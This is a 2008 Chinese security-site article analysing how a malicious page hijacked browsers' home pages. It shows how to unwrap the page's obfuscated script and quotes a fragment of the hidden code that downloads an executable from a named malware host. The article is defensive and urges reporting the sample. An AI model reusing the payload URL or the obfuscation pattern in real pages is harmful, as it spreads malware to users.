通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 爱心红客 电信网通铁通移动 在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 安全防御 >> 安全相关 >> 文章正文
轻松挖出恶意网站中藏的病毒
责任编辑:酷酷の鱼   更新日期:2008-5-3
 

来源:安全中国

前不久,很多网友都感染了www.7b.com.cn的病毒,首页被改成这个网站,并且无法改回。黑客是如何做到锁定用户的浏览器首页呢?下面我们就去探个究竟。

  提醒:分析病毒存在一定风险,建议在虚拟机下操作。

  第一步 查看www.7b.com.cn首页的源代码,可以发现在尾部有如下的字样:

  这是一个嵌入到7b网址之家首页的页面,即打开www.7b.com.cn也就同时打开了这个页面。

  而“http://m.dashow.com.cn/m.html”表示的是一个字符串,“&#”后面是每个字符串ASCII的十进制值。

  直接把这段乱码保存为HTM文件,用IE打开,就可以看到它的真实面目“http://m.dashow.com.cn/m.html”。

  第二步 查看http://m.dashow.com.cn/m.html的源代码,把看的脚本段中的Execute替换为Document.Write,然后打开这个HTM页面,就会出现一段代码,同样地,把EXECUTE换成我们无敌的Document.Write,前后加脚本标记,存HTM打开。屏幕上立即出现了一段令人眼花的东西。把眼花缭乱的东西整理一下,并将出现的CHR()在前面用到过,作用是把字符的ASCII转成字符,只不过这次是16进制。然后再将字符拼接成字符串,然后再Execute运行这个命令字符串。继续用Document.Write替换掉EXECUTE,前后加脚本标记,存HTM打开。

  第三步 经过上几步的还原后终于看到了这个恶意页面的最终面目。

  on error resume next curl = "http://m.dashow.com.cn/start.exe"……其后省略。

  这段代码中我们可以很清楚地看到http://m.dashow.com.cn/start.exe这个链接。没错,它就是运行后可以将用户主页锁定为www.7b.com.cn的病毒。

  可以用下载工具将这个文件下载下来,如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒,并使更少的网友免受该病毒的侵害。

  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    固顶文章 企业网络组建与维护班正式开课
    普通文章 瑞星公司05月03日发布 每日计算机病毒及木马播报
    普通文章 Sun Java 系统目录代理服务器远程非授权访问漏洞
    普通文章 Novell GroupWise处理 mailto URI缓冲区溢出漏洞
    普通文章 只需这几招:拒绝重复感染病毒
    普通文章 手动清除隐藏病毒文件的五个小技巧
    普通文章 认清网页恶意代码,教你应对之法
    普通文章 轻松挖出恶意网站中藏的病毒
    推荐文章 推荐:各种木马的隐藏技术全方位大批露
    普通文章 病毒导致输入法无效的处理方法
    热门文章
    普通文章家乐福中国网站暂停运行
    普通文章黑客企图利用一个关键Windows系统的漏洞
    普通文章“赛波”变种病毒利用微软漏洞传播
    普通文章微软警告Windows存漏洞 网络服务器或遭攻击
    普通文章警惕!黑客之手已经伸向Google搜索引擎
    普通文章黑客揭秘:“互联网上什么黑钱都好赚”
    普通文章卡巴斯基4月14日至20日周病毒报告
    普通文章iPhone和Wii浏览器易使用户遭到钓鱼攻击
    普通文章让 “KAV 7” 与其它杀软都和平相处
    推荐文章推荐:从零开始为您的电脑系统做漏洞自检
    精彩专题